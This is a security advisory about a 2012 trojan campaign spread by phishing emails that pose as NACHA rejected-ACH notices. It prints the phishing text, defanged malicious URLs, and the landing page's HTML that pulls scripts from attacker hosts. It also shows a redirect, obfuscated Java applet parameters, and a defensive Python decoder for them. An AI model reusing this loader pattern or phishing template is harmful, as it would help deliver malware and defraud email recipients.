Emails regarding rejected ACH payments contain a security risk
January 31, 2012
MX Lab, http://www.mxlab.eu, has started intercepting a new trojan distribution campaign spread by email, with subjects like:
Rejected ACH transaction
Rejected ACH payment
Your ACH transfer
…
The emails are sent from spoofed addresses like:
"\"The Electronic Payments Association\" risk.manager"@nacha.org
"\"The Electronic Payments Association\" alerts"@nacha.org
"\"The Electronic Payments Association\" risk"@nacha.org
"\"The Electronic Payments Association\" transfers"@nacha.org
"\"The Electronic Payments Association\" ach"@nacha.org
"\"The Electronic Payments Association\" payment"@nacha.org
…
The email has the following body:
The ACH transaction (ID: 02710822288793), recently sent from your checking account (by you or any other person), was rejected by the Electronic Payments Association.

Canceled transaction
Transaction ID: 02710822288793
Reason for rejection: See details in the report below
Transaction Report: report_02710822288793.doc (Microsoft Word Document)

13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
2011 NACHA – The Electronic Payments Association
A sample of the email:

The URLs for the transaction report vary between emails and in some cases are no longer valid. Some examples:
hxxp://minalimo.com/f9oYYmiY/index.html
hxxp://maerlipinte.ch/LaV4inWa/index.html
hxxp://hotel-sicily.it/aRpcdCjd/index.html
…
One of the URLs did give us a result: hxxp://ftp.samisalami.com/8KQZuSAy/index.html.
When we examined the HTML source of this web page we found the following:
<html>
  <h1>WAIT PLEASE</h1>
  <h3>Loading...</h3>
  <script type="text/javascript" src="hxxp://firstnamestore.com/utn08WYD/js.js"></script>
  <script type="text/javascript" src="hxxp://ftp.adamsmarketing.com/VRssE3iH/js.js"></script>
  <script type="text/javascript" src="hxxp://mediapoolstarnberg.de/WrqeCaoy/js.js"></script>
  <script type="text/javascript" src="hxxp://paolomisirochi.com/nqrmZKRC/js.js"></script>
  <script type="text/javascript" src="hxxp://lonnytyler.com/MZF0uXsc/js.js"></script>
  <script type="text/javascript" src="hxxp://orquestrachapo.com/jAmCDzeM/js.js"></script>
</html>
As you can see, several JavaScript files are loaded when this page is opened. Some of the script URLs are also obsolete, but some of them still return the code: document.location='hxxp://sulusate.com/forum/index.php?showtopic=997439';
That URL returns a web page with the following code:
<body>
  <applet code='Verifa.class' archive='rhi.jar' width='24' height='22'>
    <param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAvlmrs">
  </applet>
</body>
<body>
  <applet code='Ooo.class' archive='Ooo.jar' width='24' height='22'>
    <param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAsfi">
  </applet>
</body>
When opening these URLs in a web browser – something we do not recommend even trying – you will be redirected to bing.com or another web site, so you will not see this code.
It seems that some of the JavaScript is obfuscated and that .jar files are loaded here through an applet. The risk is that these Java applets could contain malicious code. The name Ooo.jar is normally associated with OpenOffice, but in this case it can also be used for phishing.
This email is without doubt a security risk – a virus or a phishing attempt – so do not follow any of the URLs or open any files.
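To see what the applets would actually fetch, the following added example (not MX Lab's code) decodes the two dest values quoted above under the assumption that every character of the real URL has been shifted up by 4 ASCII positions; that assumption is checked against the sample itself, whose prefix lxxt>33 maps to http://. Decoded URLs are written as hxxp:// in line with the rest of this post.

```python
# Added example, not part of the original MX Lab analysis.
# Assumption: the applet "dest" parameter is the real URL with each character
# shifted up by a fixed ASCII offset of 4 ("lxxt>33" -> "http://").
from urllib.parse import urlsplit

OFFSET = 4  # assumed per-character ASCII shift

# The two "dest" values quoted in the post (copied as sample input)
SAMPLE_DEST_VALUES = [
    "lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAvlmrs",
    "lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAsfi",
]


def decode_dest(value, offset=OFFSET):
    """Undo the assumed fixed ASCII offset on an applet 'dest' value."""
    return "".join(chr(ord(c) - offset) for c in value)


def looks_like_url(text):
    """Sanity check: the decoded text must carry a scheme and a host."""
    parts = urlsplit(text)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def defang(url):
    """Write the scheme as hxxp:// so the URL is not clickable in reports."""
    return url.replace("http://", "hxxp://", 1).replace("https://", "hxxps://", 1)


def analyse(values):
    """Decode each value; report the defanged URL and host, or None if the
    offset hypothesis does not yield a URL (e.g. a different encoding)."""
    results = []
    for value in values:
        decoded = decode_dest(value)
        ok = looks_like_url(decoded)
        results.append({
            "encoded": value,
            "decoded": defang(decoded) if ok else None,
            "host": urlsplit(decoded).netloc if ok else None,
        })
    return results


if __name__ == "__main__":
    for r in analyse(SAMPLE_DEST_VALUES):
        print(r["encoded"], "->", r["decoded"])
```

Both values decode to the same host already named in the post, sulusate.com, which is the indicator to block; a value that does not decode to a URL is reported as None rather than guessed at.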